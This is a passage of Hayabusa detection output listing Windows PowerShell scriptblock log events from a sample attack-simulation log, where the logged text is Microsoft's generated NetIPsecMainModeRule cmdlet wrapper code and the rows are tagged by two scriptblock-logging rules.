[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings 
= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
